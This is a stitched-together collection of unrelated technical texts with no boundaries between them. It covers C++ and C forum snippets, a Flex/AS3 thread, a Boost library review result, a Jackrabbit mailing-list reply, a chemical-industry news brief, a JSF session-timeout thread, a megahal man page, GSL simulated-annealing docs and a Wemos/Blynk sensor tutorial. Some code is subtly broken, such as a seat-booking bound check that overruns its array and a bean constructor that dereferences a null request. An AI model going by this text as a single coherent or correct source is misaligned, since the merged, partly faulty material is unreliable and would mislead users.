I'd do something like this then:
#define TOTAL_SEATS 10          //total number of seats
#define START_SMOKING_SEATS 5   //what seat number and up are smoking

unsigned char smoking = 0;
unsigned char nonsmoking = 0;
unsigned char seats[TOTAL_SEATS];

do {
    // cout code
    if (input_smoking) {
        if (smoking > (TOTAL_SEATS-START_SMOKING_SEATS)) {
            // no more smoking seats
        } else {
            seats[smoking+START_SMOKING_SEATS] = 2;  // 2 = smoking
            smoking++;
        }
    } else if (input_nonsmoking) {
        if (nonsmoking == START_SMOKING_SEATS) {
            // no more non-smoking seats
        } else {
            seats[nonsmoking] = 1;  // 1 = non-smoking
            nonsmoking++;
        }
    }
} while ((smoking+nonsmoking) != TOTAL_SEATS);
Something like that.
There is some pseudocode in it, so you'll still have to do some thinking...
This post has been edited by microchip: 23 November 2005 - 02:11 PM
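Fleshing that pseudocode out into a complete program might look like this (prompts and seat numbering are illustrative; the "offer the other section" refinement from post #4 is left out for brevity):

#include <iostream>
using namespace std;

#define TOTAL_SEATS 10          // total number of seats
#define START_SMOKING_SEATS 5   // seats [5]-[9] are smoking

int main() {
    int seats[TOTAL_SEATS] = {0};   // 0 = empty, 1 = non-smoking, 2 = smoking
    int smoking = 0, nonsmoking = 0;
    int choice;

    do {
        cout << "Please type 1 for smoking, 2 for non-smoking: ";
        cin >> choice;

        if (choice == 1) {                              // smoking request
            if (smoking == TOTAL_SEATS - START_SMOKING_SEATS) {
                cout << "Smoking section is full.\n";
            } else {
                seats[START_SMOKING_SEATS + smoking] = 2;
                cout << "Your seat is " << START_SMOKING_SEATS + smoking
                     << " (smoking section).\n";
                smoking++;
            }
        } else if (choice == 2) {                       // non-smoking request
            if (nonsmoking == START_SMOKING_SEATS) {
                cout << "Non-smoking section is full.\n";
            } else {
                seats[nonsmoking] = 1;
                cout << "Your seat is " << nonsmoking
                     << " (non-smoking section).\n";
                nonsmoking++;
            }
        }
    } while (smoking + nonsmoking < TOTAL_SEATS);

    cout << "Flight is full. Next flight leaves in 3 hours.\n";
    return 0;
}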
#include <stdio.h>
#include <stdlib.h>
int i=0;
int main(void) {
printf("input:");
scanf("%d", &i);
printf("\nhey dude, %d\n", i);
puts("!!!Hello World!!!"); /* prints !!!Hello World!!! */
return EXIT_SUCCESS;
}
5 // this was my input in console
input:
hey dude, 5
!!!Hello World!!!
Oh, my bad... Is it normal that I have to add a fflush(stdout) after every printf? I had experience running gdb in a terminal and I didn't need that, and I'm pretty sure that when I used Eclipse in the past it wasn't needed...
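The usual cause: when stdout is connected to a pipe (as it is under the Eclipse console) the C library switches it from line-buffered to fully buffered, so output only appears once the buffer fills or the program exits. Instead of adding fflush(stdout) everywhere, one option is to disable buffering once at startup; a minimal sketch:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    /* Make stdout unbuffered so prompts appear immediately,
       even when stdout is a pipe rather than a terminal. */
    setvbuf(stdout, NULL, _IONBF, 0);

    int i = 0;
    printf("input:");
    if (scanf("%d", &i) == 1)
        printf("\nhey dude, %d\n", i);

    return EXIT_SUCCESS;
}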
Creating properties from as3 (christoferek, Jun 15, 2009 1:09 PM)
Hi All,
I have
<mx:Canvas
so there are no properties in this component.
I want to add a new component now:
var itemPicX:Bitmap = new Bitmap();
var wrapperX:UIComponent = new UIComponent();
wrapperX.addChild(itemPicX);
wrapperX.name = "first picture";
wrapperX.id = "itemPicX";
Application.application.prepBlobs.addChild(wrapperX);
Application.application.prepBlobs.itemPicX.visible = true;
This fails with the error: Error #1069: Property itemPicX not found on mx.containers.Canvas and there is no default value.
What am I doing wrong?
I did all of this because I want to loop over all the elements within the canvas. I want to create them at the beginning of the loop and remove all of them using prepBlobs.removeAllChildren at the end of the loop.
Christopherek
1. Re: Creating properties from as3 (leybniz, Jun 15, 2009 10:26 PM, in response to christoferek)
Application.application.prepBlobs.itemPicX.visible = true
itemPicX - is not a property of Canvas.
If you want to iterate through Canvas childs, use this one loop:
for each (var d:DisplayObject in prepBlobs.getChildren()) {
    // work with each child 'd' here
}
If you feel this message answers your question or helps, please mark it respectively
2. Re: Creating properties from as3 (christoferek, Jun 16, 2009 12:11 AM, in response to leybniz)
Hi Alex,
Thank you for your answer.
To be fully happy I want to know how to make itemPicX a property of the canvas and use it like this: Application.application.xxx.yyy
That makes the most difficult problem to me.
Chris
3. Re: Creating properties from as3 (leybniz, Jun 16, 2009 12:31 AM, in response to christoferek)
Why do you need it to be a property? Actually the use of Application.application is discouraged, so it would be better to go with something else.
for example you could come up with your own modelHolderClass, which will contains all the references you need elsewere in the code.
public class ModelLocator {

    private static var instance:ModelLocator;

    public var itemPicX:DisplayObject;

    public function ModelLocator() {
        if (instance)
            throw new Error('Error instance already exists', getQualifiedClassName(this));
    }

    public static function getInstance():ModelLocator {
        if (!instance)
            instance = new ModelLocator();
        return instance;
    }
}
And you are using it like this:
Inside your Application tag
ModelLocator.getInstance().itemPicX = new Image(); and so on..
anywhere in the code access this property using the same line of code:
ModelLocator.getInstance().itemPicX
4. Re: Creating properties from as3 (christoferek, Jun 16, 2009 1:04 AM, in response to leybniz)
Hi Alex,
Thank you for your kind answer.
I want a simple thing to do:
Create a canvas, add some children like html component, add pictures to it as children, take a snapshot of the result and then remove all the children from the canvas. And repeat all this again a few times.
Using Application.application.prepBlobs.children makes it easy to use Application.application.prepBlobs.removeAllChildren for clearing the stage.
prepBlobs is a canvas created in MXML and all other children are created dynamicaly by as3. (or I overlooked something and my thinking goes in wrong direction).
I noticed that having images created by MXML is easier to add as a child to the canvas but after deleting there is no way to recreate them (images) as MXML. That's the point and my thinking went into using as3 to create all the needed children.
Is my idea correct?
Chris
5. Re: Creating properties from as3 (leybniz, Jun 16, 2009 9:12 AM, in response to christoferek)
I have an better Idea for you,
why don't you create your very own Canvas Descendant class in pure AS3 and put all logic inside of it?
something like this:
public class YourCanvas extends Canvas {
public function addStuffToCanvas(stuff:*):void {
}
public function cleanCanvas():void {
this.removeAllChildren();
}
public function takeASnapshot():BitmapData {
return snapshot data;
}
}
If you feel this message answers your question or helps, please mark it respectively
6. Re: Creating properties from as3 (christoferek, Jun 18, 2009 12:58 AM, in response to leybniz)
Hi Alex,
You are great.
I have just implemented your idea.
Your soulution simplifies a few problems and works like a charm.
Thank you.
Chris
Subject: [Boost-announce] [boost] [review] [Local] Review Result - ACCEPTED
From: Jeffrey Lee Hellrung, Jr. (jeffrey.hellrung_at_[hidden])
Date: 2011-12-12 03:15:19
Local is ACCEPTED into Boost.
After following the lively Local review discussion several weeks ago, and
reviewing the discussion a second (and sometimes third) time, I have come
to the above conclusion. There was quite a bit of passion on both sides of the aisle, and thus, obviously, no decision I make would be well-received by all.
Let me start by summarizing the main arguments against including Local in
Boost:
(a) Local functions are not very useful, at least in the presence of
existing alternatives (e.g., namespace functions and Boost.Phoenix).
(b) Local is really a portability library for C++03 presenting an imperfect
emulation of features readily available in C++11.
(c) Local's interface is primarily macro-based, making code ugly and
difficult to read.
In my opinion as the review manager, a sufficient number of individuals in
the discussion found the library "useful" to address (a) (sometimes with
additional positive adverbs); indeed, at least a couple individuals have
shared positive experiences with real-world use. Namespace functions
require one to move code to somewhere other than where one may prefer to
have it, and often requires a significant amount of boilerplate when
binding local variables. Aside from any perceived issues with
Boost.Phoenix's syntax and compiler error messages, it has been noted that
binding member functions within Boost.Phoenix can get ugly. As far as (b)
is concerned, the community seems pretty far from reaching a consensus on
whether a library described by (b) belongs in Boost. There are certainly
libraries currently in Boost that could be pegged to satisfy (b) as well,
though they all have other mitigating features they make their situation
different from Local in some way. As far as (c) is concerned, several have
acknowledged that a macro-based interface is necessary to implement local
functions in C++03, and it seems to have been generally agreed that, given
this limitation, Lorenzo has done an admirable job making the interface as
easy-to-use as possible. Some find it ugly, others find it reasonable.
In addition to the counterarguments of (a-c) above, the following facts
weighed into my final decision:
* Lorenzo has been engaging and in constant communication with the
developer's list during the development of Local. This gives me confidence
that he will continue to actively maintain (and improve?) Local.
* The documentation is unanimously agreed to be of Boost quality.
* The transition of some organizations from C++03 to C++11 may take several
more years, and Boost has a history of supporting "ancient" compilers (for
better or worse). The point being, a library that eases the transition from
C++03 to C++11 has some merit based on current precedent.
* There had been previous work on local functions by Alexander Nasanov and
Steven Watanabe shared on the developer's list, suggesting a desire for
this functionality for some time.
* Local is approximately an extension of Boost.ScopeExit; indeed, it
basically fulfills the request to Alexander Nasanov from the review result
[2] of Boost.ScopeExit to create such an extension.
Lastly, my own opinion of "what Boost is" factored in here. I view Boost as
*partly* a collection of general purpose libraries that can be used in wide
variety of applications (and thus Boost frequently acts as a staging ground
for standard adoption). Based on review feedback, I believe Local satisfies
this criterion; and based on the mailing list discussion, I believe this
view of Boost is not entirely inconsistent with others on the mailing list.
Ultimately, it wasn't so much a # of "yes" votes versus # of "no" votes as
it was the above general considerations. Regardless, I think independent of
how the votes were counted, the "yes" votes outnumbered the "no" votes.
This required some discretion on my part as not everyone who expressed an
opinion submitted a formal review, and some participants were only arguing
in favor of some specific point supporting either acceptance or rejection
of Local.
"Yes" reviews (7)
--------
Krzysztof Czainski
Andrzej Krzemienski
Pierre Morcello
Nat Lindon
John Bytheway
Edward Diener
Gregory Crosswhite
"No" reviews (3)
--------
Vicente J. Botet
Thomas Heller
Hartmut Kaiser
Paul A. Bristow and Alexander Nasanov (the author of Boost.ScopeExit) both
submitted reviews but did not express an opinion (as far as I could tell)
on whether Local should be included in Boost, though if I had to peg
Paul's, it would be to reject Local. From what I gathered, Joel de Guzman,
Joel Falcou, Dean Michael Berris, and Lucanus J. Simonson were opposed to
including Local in Boost (the aforementioned did not submit a formal
review, though a formal review might be unnecessary if your vote is "no").
On the other hand, Brian Wood, Philippe Vaucher, Mathias Gaunard, Robert
Ramey, Nathan Ridge, Brent Spillner, Thomas Klimpel, Christopher Jefferson,
Daniel James, Rafael Fourquet, Matthias Schabel, and Robert Stewart
participated in the discussion and argued in favor of some point that
supported accepting Local in Boost. I want to be clear here that certainly
not everyone in the aforementioned list even implied that they supported
acceptance of Local (I would guess that only roughly half implied as much),
but they indirectly helped its case by addressing arguments against
inclusion. Overall, that indicates to me that more individuals support
acceptance of Local into Boost than rejection.
[Apologies for any name misspellings and absent accents.]
Regarding Boost.ScopeExit: 4 reviews were in favor of deprecating
Boost.ScopeExit; 3 reviews felt there was nothing wrong with both
Boost.ScopeExit and Local coexisting; and 3 reviews mentioned the
possibility of improving Boost.ScopeExit with the features provided by
Local's exits. As such I'm inclined to let Alexander (who opposed any kind
of merging of Local and Boost.ScopeExit) work with Lorenzo on improving
Boost.ScopeExit as he sees fit, and hopefully both libraries can address
this apparent duplication of functionality within their respective
documentation to avoid user confusion.
Regarding local::function::overload: Based on the review comments, it makes
the most sense to add this to Boost.Functional.
Regarding BOOST_IDENTITY_TYPE: This should be added to Boost.Utility. On
the other hand, there doesn't appear to be a compelling use case for
BOOST_IDENTITY_VALUE.
The following are some suggested *possible* improvements that reviewers
brought up. This list is by no means exhaustive. Further, I personally
don't think all of these suggestions are necessarily "good", but I think
it's fair for Lorenzo (and the community) to consider them nonetheless.
Parenthetic comments are my own opinions.
* Some aren't convinced of the utility of LOCAL_BLOCK. (Its use cases
appear fairly narrow so it might be best to simplify the library and remove
this capability.)
* Use "this_" (as opposed to "_this") as an alias for "this" within
function bodies, and possibly also within bind declarations.
* Present Boost.PP sequence interface as a workaround for the variadic
interface? (I don't have a problem with supporting both interfaces at the
top level.)
* "Local" and "Locale" look too much alike, suggesting a name change to
"Scope", "Scoped", "LocalFunction", "Closure" may be a good idea?
* Allow use without dependence on Boost.TypeOf.
* Rename prefix and postfix macros from XXX_PARAMS/XXX_NAME to XXX/XXX_END?
(I don't mind the current macros.)
* Explicitly separate bound variables from function parameters. (I think
this suggestion has merit but I don't know what the interface could look
like.)
* Remove support for default parameters to simplify interface and
documentation? (It doesn't seem like default function parameters would be
very useful.)
* Use "capture" instead of "bind" for the bind/capture keyword? (I like and
prefer "bind".)
Finally, here the links to the submitted formal reviews, for reference. Of
particular note are Krzysztof's and John's reviews for their comments on
the documentation. Some "yes" votes were conditional, but AFAIK Lorenzo has
already agreed to address the relevant conditions.
Krzysztof Czainski
Vicente J. Botet
Andrzej Krzemienski
Paul A. Bristow
[...cannot find link to review...]
Pierre Morcello
Nat Lindon
Thomas Heller
Hartmut Kaiser
John Bytheway
Alexander Nasanov
Edward Diener
Gregory Crosswhite
Finally, really big thanks to everyone for participating in the review and
ancillary discussions. I attempted to be as transparent as possible in
outlining the rationale for my decision above, but if you have any further
questions, do not hesitate to ask.
- Jeff, Review Manager for Local
[1]
[2]
Hi,
Michael Wechner wrote:
> Or what other possibility is there to export stuff with namespaces used?
I'm not sure if this matches your requirements, but you could take a
look at my custom XML exporter class at [1]. Instead of exporting an
entire content subtree, you can implement selective exports by
overriding the includeProperty and includeNode methods. See the class
javadoc for more details and example code.
[1]
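For illustration only, a selective exporter along the lines described might look like this; the base class name (XMLExporter) and the exact hook signatures are assumptions based on the description above, not the actual jcr-ext API:

import javax.jcr.Node;
import javax.jcr.Property;
import javax.jcr.RepositoryException;

// Hypothetical subclass of the custom XML exporter described above.
// Base class and hook signatures are assumed for illustration.
public class SelectiveExporter extends XMLExporter {

    // Skip all properties in the "jcr:" namespace.
    protected boolean includeProperty(Property property)
            throws RepositoryException {
        return !property.getName().startsWith("jcr:");
    }

    // Only export nodes below /content.
    protected boolean includeNode(Node node)
            throws RepositoryException {
        return node.getPath().startsWith("/content");
    }
}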
I'm still prototyping some aspects of my proposed jcr-ext package, so I
haven't yet committed the class to Jackrabbit contrib. I'll do that once
I'm happy with the overall design.
BR,
Jukka Zitting
29 June 2012 11:45 [Source: ICIS news]
BRISBANE (ICIS)--Thai MMA plans to shut its 90,000 tonne/year No 1 methyl methacrylate (MMA) line at Map Ta Phut for 10-14 days from July 10 on shortage of feedstock isobutylene, a company source said on Friday.
The company normally secures its raw material from Bangkok Synthetics (BST).
Thai MMA’s No 1 line is currently running at 60-70% of capacity, while its No 2 line with the same 90,000 tonne/year capacity is currently operating at 100%, the source said.
The company is a joint venture.
Timing out from a bean
Christopher Sharp, posted Jan 28, 2013 11:35:51:
Hello,
I want my session to timeout after a given interval of time. In web.xml I've been playing around with:
<session-config>
    <session-timeout>20</session-timeout>
</session-config>
where the time is in minutes. This works correctly for testing if I set the time to 1 minute.
What I would like to do is to do it programmatically, using code like this inside my bean, as follows:
@ManagedBean(name="login") @SessionScoped public class MyLoginBean implements HttpSessionListener, Serializable { // private variables etc. HttpServletRequest request; HttpSession session = request.getSession(); public MyLoginBean() { session.setMaxInactiveInterval(20); } // The rest of the code }
where the timeout here is now 20 seconds for test purposes. Unfortunately, on opening up a browser to look at the application, it fails with the message:
com.sun.faces.mgbean.ManagedBeanCreationException: Cant instantiate class: com.csharp.MyLoginBean.
Followed by:
java.lang.NullPointerException
What am I doing wrong here? I know that setMaxInactiveInterval() refers to the particular session, which in this case is the login bean, rather than everything, which is what the code in web.xml specifies. I have several beans, but timing out the login bean is the only one that matters.
I'm using JSF 2.0 with Glassfish 3.1.1 and Eclipse Indigo, so some advice would be very much appreciated.
Tim Holloway, posted Jan 29, 2013 05:33:02:
Even before we start talking JSF, there are a couple of things.
1. User-designed login systems are one of the biggest causes of exploitable webapps there are. I always recommend using a security system that was designed and tested by professional security experts over the DIY approach.
J2EE has a login system built right into the specification and it's quite adequate for the overwhelming majority of all J2EE webapps. I realize that almost every J2EE book ever published has a sample "login form" processor, but in the real world, that's just painting a target on your back.
2. Web applications are not processes. They do not execute except when a request comes in, needs processing, and a response is sent. They do not run as tasks or threads, but instead are called on-demand under a thread that is assigned by the webapp server when the request comes in. That thread is then returned to a general pool when the response has been sent back. So JSF bean or not, there's no way to set up a timer in J2EE-compliant code.
3. The J2EE HttpSession object has a finite lifespan, which can be specified in the WEB-INF/web.xml file. The lifespan is the maximum amount of time allowable between incoming Http requests from the user associated with that session. Thus, every time a request comes in, a countdown begins for the session. If that countdown goes to zero, the session is destroyed by the webapp server (NOT the web application). The actual time of destruction is not predictable except that it is guaranteed not to be destroyed until the session timeout has expired. The actual destruction will be handled by the webapp server when it is convenient, although the session itself will be unavailable to any requests coming in in the mean time - a new session would have to be constructed if those requests needed a session.
Now for the JSF-specific stuff:
A JSF managed bean is intended to be a POJO. Attempting to store HttpRequest, HttpResponse, FacesContext or other request-related objects in static code will fail, since any such object would be meaningful only as long as the request that constructed the bean is being processed. The same is also true for member methods and constructors - none of these objects can safely carry over between requests.
Customer surveys are for companies who didn't pay proper attention to begin with.
Christopher Sharp, posted Jan 29, 2013 09:02:18:
Hello Tim,
Yes, I remember you mentioning a while ago about security issues on login pages. Since then I've been working on other parts of my application, which is now mostly finished, and have not done anything with the login page since then until now. In any case, while testing I've disabled the login.
I was playing around and seeing how to get a system to timeout, but I'm aware that the timeout takes place after the last activity. I tried the following with a very short timeout in seconds:
public MyLoginBean() {
    HttpSession session = (HttpSession) FacesContext.getCurrentInstance()
            .getExternalContext().getSession(true);
    session.setMaxInactiveInterval(10);
}
and it appears to work.
I've just done a quick Google search, and there are resources available on this. The problem is that I don't have much time, so I need to put something together that I can get to work without spending weeks on it.
Do you know of any links with canned login software that I can put in my application with the minimum amount of extra work? That would be very helpful.
Incidentally, how do I correct the subject heading? I only noticed my mistake after submitting. Another question is that after clicking "Submit" a CSRF error page appears.
Tim Holloway, posted Jan 29, 2013 10:00:57:
If you want to set the session timeout interval on a user-by-user basis, I don't think that a JSF bean constructor is the optimal place to do it. You probably should consider putting that logic either in a session listener or a servlet filter. That way your session timeout won't be at the mercy of JSF. Besides, there really aren't a whole lot of things it's safe to do in a ManagedBean constructor anyway, since the bean isn't fully initialized at that point.
If you use J2EE Container-Managed security, there are no "canned login" routines, because the login is handled entirely by the server, not by logic in the web application. All you need to do is configure web.xml.
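For reference, the container-managed setup is declared in web.xml with entries along these lines (the URL pattern, role name, and login pages are placeholders):

<security-constraint>
    <web-resource-collection>
        <web-resource-name>Protected pages</web-resource-name>
        <url-pattern>/app/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
        <role-name>user</role-name>
    </auth-constraint>
</security-constraint>

<login-config>
    <auth-method>FORM</auth-method>
    <form-login-config>
        <form-login-page>/login.xhtml</form-login-page>
        <form-error-page>/loginError.xhtml</form-error-page>
    </form-login-config>
</login-config>

<security-role>
    <role-name>user</role-name>
</security-role>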
I can't remember where, but if you nose around a bit, you should be able to edit your message heading. The CSRF error is probably because we're working on the Ranch security system at the moment.
SYNOPSIS
#include <megahal.h>
void megahal_setnoprompt(void);
void megahal_setnowrap(void);
void megahal_setnobanner(void);
void megahal_seterrorfile(char *filename);
void megahal_setstatusfile(char *filename);
void megahal_initialize(void);
char *megahal_initial_greeting(void);
int megahal_command(char *input);
char *megahal_do_reply(char *input, int log);
void megahal_output(char *output);
char *megahal_input(char *prompt);
void megahal_cleanup(void);
DESCRIPTION

Initialization

Megahal is initialized with the megahal_initialize() function. megahal_setnoprompt() eliminates the prompt from interactive sessions. megahal_setnowrap() stops output from being wrapped. megahal_setnobanner() prevents megahal from printing out the initial 'banner'.
Files
megahal_seterrorfile and megahal_setstatusfile set which files megahal will use for error and status reporting, respectively.
User interaction
megahal_initial_greeting returns an initial greeting for the user, such as "hello", "ciao", etc... megahal_command checks its input for a Megahal command (like QUIT), and acts upon it, if found. If it finds nothing, it returns 0. megahal_do_reply is the core of megahal. It takes a string as input, and calculates a reply, which it returns. megahal_output is for outputting text to stdout, such as megahal's replies. Input may be obtained with megahal_input, which takes a prompt string as an argument, and returns a string input by the user.
Example
main.c in the source distribution is a good example of how to use Megahal's C API.
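Based on the synopsis above, a minimal interactive driver in the spirit of main.c might look like this (whether megahal_command handles QUIT by itself, or the caller should exit on a nonzero return as done here, is an assumption):

/* Minimal interactive driver; details of the original main.c may differ. */
#include <stdio.h>
#include <stdlib.h>
#include <megahal.h>

int main(void)
{
    char *input, *output;

    megahal_setnobanner();
    megahal_initialize();

    output = megahal_initial_greeting();
    megahal_output(output);

    for (;;) {
        input = megahal_input("> ");
        if (megahal_command(input))     /* nonzero: a command like QUIT */
            break;
        output = megahal_do_reply(input, 1 /* log */);
        megahal_output(output);
    }

    megahal_cleanup();                  /* save the brain to disk */
    return EXIT_SUCCESS;
}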
TCL INTERFACE
load libmh_tcl.so
Load the Tcl interface shared object into the Tcl interpreter.
mh_init
Initialize megahal brain.
mh_doreply text
Takes some text as input and returns a megahal reply.
mh_cleanup
Save megahal brain to disk. You will lose your changes if this does not occur.
PYTHON INTERFACE
import mh_python
Import the Megahal Python interface into the Python interpreter.
mh_python.initbrain()
Initialize megahal brain.
mh_python.doreply(text)
Takes some text as input and returns a megahal reply.
mh_python.learn(text)
Takes some text as input and updates the model without generating a reply.
mh_python.cleanup()
Save megahal brain to disk. You will lose your changes if this does not occur.
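A minimal usage sketch of the Python interface above:

import mh_python

mh_python.initbrain()                 # initialize the megahal brain
print(mh_python.doreply("Hello there!"))
mh_python.learn("This text updates the model without generating a reply.")
mh_python.cleanup()                   # save the brain; unsaved changes are lost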
REFERENCES

More information can be found about megahal at

Jason Hutchens, the original author of Megahal, can be found at:

BUGS

The C library is not yet ready.

AUTHOR

Man page written by David N. Welton <[email protected]>, modified by Laurent Fousse <[email protected]>.
|
double (*gsl_siman_Efunc_t) (void *xp)
void (*gsl_siman_step_t) (const gsl_rng *r, void *xp, double step_size)
double (*gsl_siman_metric_t) (void *xp, void *yp)
void (*gsl_siman_print_t) (void *xp)
void (*gsl_siman_copy_t) (void *source, void *dest)
void * (*gsl_siman_copy_construct_t) (void *xp)
void (*gsl_siman_destroy_t) (void *xp)
These are the parameters that control a run of gsl_siman_solve. This structure contains all the information needed to control the search, beyond the energy function, the step function and the initial guess.

int n_tries
    The number of points to try for each step.
int iters_fixed_T
    The number of iterations to perform at each temperature.
double step_size
    The maximum step size in the random walk.
double k, t_initial, mu_t, t_min
    The parameters of the Boltzmann distribution and the cooling schedule.
The simulated annealing package is clumsy, and it has to be because it is written in C, for C callers, and tries to be polymorphic at the same time. But here we provide some examples which can be pasted into your application with little change and should make things easier.
The first example, in one dimensional Cartesian space, sets up an energy function which is a damped sine wave; this has many local minima, but only one global minimum, somewhere between 1.0 and 1.5. The initial guess given is 15.5, which is several local minima away from the global minimum.
#include <math.h>
#include <stdlib.h>
#include <string.h>
#include <gsl/gsl_siman.h>

/* set up parameters for this simulated annealing run */

/* how many points do we try before stepping */
#define N_TRIES 200

/* how many iterations for each T? */
#define ITERS_FIXED_T 1000

/* max step size in random walk */
#define STEP_SIZE 1.0

/* Boltzmann constant */
#define K 1.0

/* initial temperature */
#define T_INITIAL 0.008

/* damping factor for temperature */
#define MU_T 1.003
#define T_MIN 2.0e-6

gsl_siman_params_t params
  = {N_TRIES, ITERS_FIXED_T, STEP_SIZE,
     K, T_INITIAL, MU_T, T_MIN};

/* now some functions to test in one dimension */
double E1(void *xp)
{
  double x = * ((double *) xp);

  return exp(-pow((x-1.0),2.0))*sin(8*x);
}

double M1(void *xp, void *yp)
{
  double x = *((double *) xp);
  double y = *((double *) yp);

  return fabs(x - y);
}

void S1(const gsl_rng * r, void *xp, double step_size)
{
  double old_x = *((double *) xp);
  double new_x;

  double u = gsl_rng_uniform(r);
  new_x = u * 2 * step_size - step_size + old_x;

  memcpy(xp, &new_x, sizeof(new_x));
}

void P1(void *xp)
{
  printf ("%12g", *((double *) xp));
}

int main(int argc, char *argv[])
{
  const gsl_rng_type * T;
  gsl_rng * r;

  double x_initial = 15.5;

  gsl_rng_env_setup();

  T = gsl_rng_default;
  r = gsl_rng_alloc(T);

  gsl_siman_solve(r, &x_initial, E1, S1, M1, P1,
                  NULL, NULL, NULL,
                  sizeof(double), params);

  gsl_rng_free (r);
  return 0;
}
Here are a couple of plots that are generated by running siman_test in the following way:

$ ./siman_test | awk '!/^#/ {print $1, $4}' | graph -y 1.34 1.4 -W0 -X generation -Y position | plot -Tps > siman-test.eps
$ ./siman_test | awk '!/^#/ {print $1, $5}' | graph -y -0.88 -0.83 -W0 -X generation -Y energy | plot -Tps > siman-energy.eps
The TSP (Traveling Salesman Problem) is the classic combinatorial optimization problem. I have provided a very simple version of it, based on the coordinates of twelve cities in the southwestern United States. This should maybe be called the Flying Salesman Problem, since I am using the great-circle distance between cities, rather than the driving distance. Also: I assume the earth is a sphere, so I don't use geoid distances.
The gsl_siman_solve routine finds a route which is 3490.62 Kilometers long; this is confirmed by an exhaustive search of all possible routes with the same initial city.
The full code can be found in `siman/siman_tsp.c', but I include here some plots generated in the following way:
$ ./siman_tsp > tsp.output
$ grep -v "^#" tsp.output | awk '{print $1, $NF}' | graph -y 3300 6500 -W0 -X generation -Y distance -L "TSP - 12 southwest cities" | plot -Tps > 12-cities.eps
$ grep initial_city_coord tsp.output | awk '{print $2, $3}' | graph -X "longitude (- means west)" -Y "latitude" -L "TSP - initial-order" -f 0.03 -S 1 0.1 | plot -Tps > initial-route.eps
$ grep final_city_coord tsp.output | awk '{print $2, $3}' | graph -X "longitude (- means west)" -Y "latitude" -L "TSP - final-order" -f 0.03 -S 1 0.1 | plot -Tps > final-route.eps
This is the output showing the initial order of the cities; longitude is negative, since it is west and I want the plot to look like a map.
# initial coordinates of cities (longitude and latitude)
###initial_city_coord: -105.95 35.68 Santa Fe
###initial_city_coord: -112.07 33.54 Phoenix
###initial_city_coord: -106.62 35.12 Albuquerque
###initial_city_coord: -103.2 34.41 Clovis
###initial_city_coord: -107.87 37.29 Durango
###initial_city_coord: -96.77 32.79 Dallas
###initial_city_coord: -105.92 35.77 Tesuque
###initial_city_coord: -107.84 35.15 Grants
###initial_city_coord: -106.28 35.89 Los Alamos
###initial_city_coord: -106.76 32.34 Las Cruces
###initial_city_coord: -108.58 37.35 Cortez
###initial_city_coord: -108.74 35.52 Gallup
###initial_city_coord: -105.95 35.68 Santa Fe
The optimal route turns out to be:
# final coordinates of cities (longitude and latitude)
###final_city_coord: -105.95 35.68 Santa Fe
###final_city_coord: -103.2 34.41 Clovis
###final_city_coord: -96.77 32.79 Dallas
###final_city_coord: -106.76 32.34 Las Cruces
###final_city_coord: -112.07 33.54 Phoenix
###final_city_coord: -108.74 35.52 Gallup
###final_city_coord: -108.58 37.35 Cortez
###final_city_coord: -107.87 37.29 Durango
###final_city_coord: -107.84 35.15 Grants
###final_city_coord: -106.62 35.12 Albuquerque
###final_city_coord: -106.28 35.89 Los Alamos
###final_city_coord: -105.92 35.77 Tesuque
###final_city_coord: -105.95 35.68 Santa Fe
Here's a plot of the cost function (energy) versus generation (point in the calculation at which a new temperature is set) for this problem:
Further information is available in the following book,
|
This Instructable looks at using the Wemos D1 Mini Pro to send datta (Temperature & Humidity) to the Blynk APP.
Step 1: Getting Started
We will get a temperature and humidity reading pushed to your Blynk App on your phone. Connect an LED as shown here: Note. I have used the blue DHT11 Digital Temperature/Humidity module which has three pins. The module is from Banggood. Other similar modules from different suppliers may have a different pin layout. Check this. The colours below are correct for the Banggood module:
Blue = Data signal (left)
Red = Vcc +5v (middle)
Black = Ground (right)
Step 2: Important.
As mentioned above.
Note. I used the blue DHT11 Digital Temperature/Humidity module from Banggood which has three pins. Other similar modules from different suppliers may have a different pin layout. Check this. The colours are correct for the Banggood module:
Blue = Data signal (left) Red = Vcc +5v (middle) Black = Ground (right)
Step 3: Getting Started With the Blynk App. You can always set up your own Private Blynk Server and have full control.
Step 4: Create a New Project
After you’ve successfully logged into your account, start by creating a new project.
Step 5: Name/Board/Connection
Give it a name and select the appropriate board (Wemos D1 Mini). Now click create.
Step 6: Authentication
Your Authentication token will be emailed to you and you will also be able to access it in the settings of your project. A new number will be generated for each project you create.
Step 7: Add Two Widgets (Value Display)
Your project canvas is empty, let’s add a two display widgets to show temperature and humidity. Tap anywhere on the canvas to open the widget box. All the available widgets are located here.
Step 8: Drag N Drop
Drag-n-Drop - Tap and hold the Widget to drag it to the new position.
Step 9: Humidity
Widget Settings - Each Widget has it’s own settings. Tap on the widget to get to them. Set them up with the following settings.
Step 10: Temperature
Widget Settings - Each Widget has it’s own settings. Tap on the widget to get to them. Set them up with the following settings.
Step 11: Run the Project.
Step 12: Run the Code.
Now let’s take a look at the example sketch for a Wemos D1 Mini Pro. Notice there are three key components that you will need to include:
1. char auth[] = ""; Specific to your project (Blynk App).
2. char ssid[] = ""; Specific to the network that we are connecting to (network name). You can "hotspot" from your phone also.
3. char pass[] = ""; Specific to the network we are connecting to (password).
CODE
#define BLYNK_PRINT Serial
#include <ESP8266WiFi.h>
#include <BlynkSimpleEsp8266.h>
#include <DHT.h>

// You should get Auth Token in the Blynk App.
// Go to the Project Settings (nut icon).
char auth[] = "";

// Your WiFi credentials.
// Set password to "" for open networks.
char ssid[] = "";
char pass[] = "";

#define DHTPIN D4     // What digital pin we're connected to
#define DHTTYPE DHT11 // DHT 11

DHT dht(DHTPIN, DHTTYPE);
BlynkTimer timer;

float t;
float h;

void setup()
{
  // Debug console
  Serial.begin(9600);
  Blynk.begin(auth, ssid, pass);
  dht.begin();
  timer.setInterval(1000L, sendSensor);
}

void loop()
{
  Blynk.run();
  timer.run();
}

// This function sends Arduino's up time every second to Virtual Pin (5).
// In the app, Widget's reading frequency should be set to PUSH. This means
// that you define how often to send data to Blynk App.
void sendSensor()
{
  h = dht.readHumidity();
  t = dht.readTemperature(); // or dht.readTemperature(true) for Fahrenheit
  // l = analogRead(LDR);

  // Push the readings to the app. The original listing was truncated here;
  // virtual pins V5/V6 are assumed and must match the Value Display widgets.
  Blynk.virtualWrite(V5, h);
  Blynk.virtualWrite(V6, t);
}
Step 13: Display
Go back to the Blynk App and check your display. You should see the current temperature & humidity.
Step 14: Photo of Project
Step 15: Video of Project Working
8 Discussions
2 months ago
When compiling, the result was:
'Horas' does not name a type.
Does anyone know how to solve this?
Thanks
Question 1 year ago
